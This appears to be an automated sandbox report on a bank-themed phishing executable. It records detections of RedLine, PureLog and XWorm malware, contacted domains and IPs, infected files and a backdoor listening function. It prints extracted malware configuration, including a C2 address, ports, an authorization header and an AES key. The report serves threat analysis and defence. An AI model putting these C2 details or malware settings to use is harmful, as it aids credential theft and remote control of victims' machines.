Source: Yara match	File source: 0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

OS version to string mapping found (often used in BOTs)

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_81
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_XP
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_XPe
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_VISTA
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_7
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: WIN_8
Source: niellist.exe, 00000011.00000002.1407658535.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.3d96458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5390000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5390000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3d95570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300ee8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2a20f3e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300ee8.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.5300000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3dfb390.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003D95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1307610428.0000000002A20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1312948986.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1312584918.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.3eaebc0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3f45010.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3ef9df0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3f45010.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build.exe.ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3ef9df0.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003F3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1311146517.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1301567190.0000000000EF2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00476283
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00476747

Screenshots

Behavior

Click here to start
Slideshow Behavior Animation

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.248.148.254	084725.parkingcrew.net	United States	16509	AMAZON-02US	false
18.142.91.111	ifsaia.biz	United States	16509	AMAZON-02US	false
54.169.144.97	ftxlah.biz	United States	16509	AMAZON-02US	false
52.43.119.120	nqwjmb.biz	United States	16509	AMAZON-02US	false
199.59.243.228	76899.bodis.com	United States	395082	BODIS-NJUS	false
165.160.13.20	myups.biz	United States	19574	CSCUS	false
52.11.240.239	oshhkdluh.biz	United States	16509	AMAZON-02US	false
208.117.43.225	gytujflc.biz	United States	32748	STEADFASTUS	false
54.85.87.184	ytctnunms.biz	United States	14618	AMAZON-AESUS	false
72.52.178.23	fwiwk.biz	United States	32244	LIQUIDWEBUS	false
204.10.161.147	unknown	Canada	64236	UNREAL-SERVERSUS	true
34.245.175.187	tbjrpv.biz	United States	16509	AMAZON-02US	false
3.229.117.57	jhvzpcfg.biz	United States	14618	AMAZON-AESUS	false
34.229.166.50	yauexmxk.biz	United States	14618	AMAZON-AESUS	false
85.214.228.140	dlynankz.biz	Germany	6724	STRATOSTRATOAGDE	false
13.213.51.196	ssbzmoy.biz	United States	16509	AMAZON-02US	false
52.212.150.54	brsua.biz	United States	16509	AMAZON-02US	false
82.112.184.197	vjaxhpbji.biz	Russian Federation	43267	FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU	false
52.26.80.133	jpskm.biz	United States	16509	AMAZON-02US	false

Contacted Domains

Name	IP	Active
76899.bodis.com	199.59.243.228	true
oshhkdluh.biz	52.11.240.239	true
jpskm.biz	52.26.80.133	true
ftxlah.biz	54.169.144.97	true
vjaxhpbji.biz	82.112.184.197	true
pywolwnvd.biz	52.11.240.239	true
ifsaia.biz	18.142.91.111	true
ytctnunms.biz	54.85.87.184	true
lrxdmhrr.biz	52.11.240.239	true
vrrazpdh.biz	52.26.80.133	true
tbjrpv.biz	34.245.175.187	true
jhvzpcfg.biz	3.229.117.57	true
saytjshyf.biz	3.229.117.57	true
084725.parkingcrew.net	13.248.148.254	true
xlfhhhm.biz	54.169.144.97	true
fwiwk.biz	72.52.178.23	true
typgfhb.biz	18.142.91.111	true
npukfztj.biz	3.229.117.57	true
esuzf.biz	52.26.80.133	true
sxmiywsfv.biz	18.142.91.111	true
przvgke.biz	72.52.178.23	true
dwrqljrr.biz	52.11.240.239	true
myups.biz	165.160.13.20	true
gytujflc.biz	208.117.43.225	true
yauexmxk.biz	34.229.166.50	true
gvijgjwkh.biz	54.85.87.184	true
ssbzmoy.biz	13.213.51.196	true
knjghuig.biz	13.213.51.196	true
yunalwv.biz	208.117.43.225	true
gnqgo.biz	34.229.166.50	true
deoci.biz	34.229.166.50	true
brsua.biz	52.212.150.54	true
iuzpxe.biz	18.142.91.111	true
nqwjmb.biz	52.43.119.120	true
wllvnzb.biz	13.213.51.196	true
cvgrf.biz	52.11.240.239	true
qaynky.biz	18.142.91.111	true
lpuegx.biz	82.112.184.197	true
bumxkqgxu.biz	3.229.117.57	true
qpnczch.biz	52.26.80.133	true
vcddkls.biz	13.213.51.196	true
acwjcqqv.biz	13.213.51.196	true
vyome.biz	52.26.80.133	true
dlynankz.biz	85.214.228.140	true
anpmnmxo.biz	unknown	unknown
ww12.fwiwk.biz	unknown	unknown
uhxqin.biz	unknown	unknown
ww7.fwiwk.biz	unknown	unknown
zlenh.biz	unknown	unknown
ww12.przvgke.biz	unknown	unknown
lejtdj.biz	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
204.10.161.147:7082	true	Avira URL Cloud: safe	unknown
http://bumxkqgxu.biz/hqwogpkl	false		high
http://gvijgjwkh.biz/rghyclqgu	false		high
http://sxmiywsfv.biz/akssysyiwejarq	false		high
http://dwrqljrr.biz/uppfulbfwwgcmugi	false		high
http://gytujflc.biz/ttplobtxqmiksba	false		high
http://saytjshyf.biz/kobojotdnctbldt	false		high
http://qaynky.biz/udiyekihhlktyw	false		high
http://iuzpxe.biz/sogowygirgwvide	false		high
http://pywolwnvd.biz/xltkhwus	false		high
http://pywolwnvd.biz/bwejhhjeahxfje	false		high
http://jhvzpcfg.biz/ef	false		high
http://esuzf.biz/ooabmbiqikucit	false		high
http://ifsaia.biz/ldqqpocfqndx	false		high
http://brsua.biz/nolqdemmkybmoyj	false		high
http://fwiwk.biz/okybrjufbtsub	false		high
http://ytctnunms.biz/skptrowoy	false		high
http://cvgrf.biz/arkfkq	false		high
http://jpskm.biz/gxk	false		high
http://npukfztj.biz/buysxojjpcbe	false		high
http://tbjrpv.biz/om	false		high
http://acwjcqqv.biz/sroelgby	false		high
http://lrxdmhrr.biz/qrwvpmlh	false		high

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ww12.przvgke.biz/uhxgrttve?usid=25&utid=9755593280hv

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Avira: detection malicious, Label: W32/Infector.Gen

Found malware configuration

Source: 00000009.00000002.1311146517.0000000003E63000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": ["204.10.161.147:7082"], "Bot Id": "success", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["204.10.161.147"], "Port": 7081, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for submitted file

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Virustotal: Detection: 79%			Perma Link
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	ReversingLabs: Detection: 86%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 204.10.161.147
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 7081
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: XWorm V5.6
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: USB.exe
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: %AppData%
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: XClient.exe

Uses 32bit PE files

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000002.00000003.1692304917.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1253422637.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000002.00000003.1762060160.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1752773778.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1751658354.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: elevation_service.exe, 0000000C.00000003.2427700205.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000002.00000003.1391363557.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000002.00000003.1539403931.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000002.00000003.1539403931.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000002.00000003.1552275013.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2427700205.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: alg.exe, 00000002.00000003.1823198394.0000000001530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1817693971.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: elevation_service.exe, 0000000C.00000003.2399836267.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdbL source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdb source: elevation_service.exe, 0000000C.00000003.2444651718.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: RegSvcs.exe, 00000013.00000002.1452607862.0000000003085000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: crashreporter.pdb source: alg.exe, 00000002.00000003.2007802565.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: niellist.exe, 00000003.00000003.1285740418.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000003.00000003.1287306724.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398255172.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398796370.0000000004F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000002.00000003.1440737342.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000002.00000003.1686861132.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2490180834.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000002.00000003.1795445513.0000000001500000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: elevation_service.exe, 0000000C.00000003.2490180834.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000002.00000003.1707389126.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1699306292.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000002.00000003.1588294725.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000002.00000003.1399996879.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdb source: elevation_service.exe, 0000000C.00000003.2475542795.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2466935099.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2370075769.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000002.00000003.1552275013.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000002.00000003.1414567794.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: alg.exe, 00000002.00000003.1399996879.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000002.00000003.1762060160.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1752773778.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1751658354.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vws\dll\mscorlib.pdb source: RegSvcs.exe, 00000013.00000002.1440773629.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000002.00000003.1440737342.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000002.00000003.1606714904.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000002.00000003.1391363557.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: alg.exe, 00000002.00000003.1823198394.0000000001530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1817693971.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.1671146289.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: alg.exe, 00000002.00000003.1311966425.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2409444636.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2444651718.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: alg.exe, 00000002.00000003.2038612293.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000002.00000003.1795445513.0000000001500000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2464490608.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2454283724.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2452694800.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000002.00000003.1649365761.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000002.00000003.1588294725.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: alg.exe, 00000002.00000003.2038612293.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbL" source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000002.00000003.1606714904.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000002.00000003.1692304917.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000002.00000003.1656511183.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdb source: elevation_service.exe, 0000000C.00000003.2464490608.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2454283724.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2452694800.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000002.00000003.1686861132.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: alg.exe, 00000002.00000003.1311966425.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000002.00000003.1707389126.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1699306292.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: niellist.exe, 00000003.00000003.1285740418.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000003.00000003.1287306724.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398255172.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398796370.0000000004F40000.00000004.00001000.00020000.00000000.sdmp
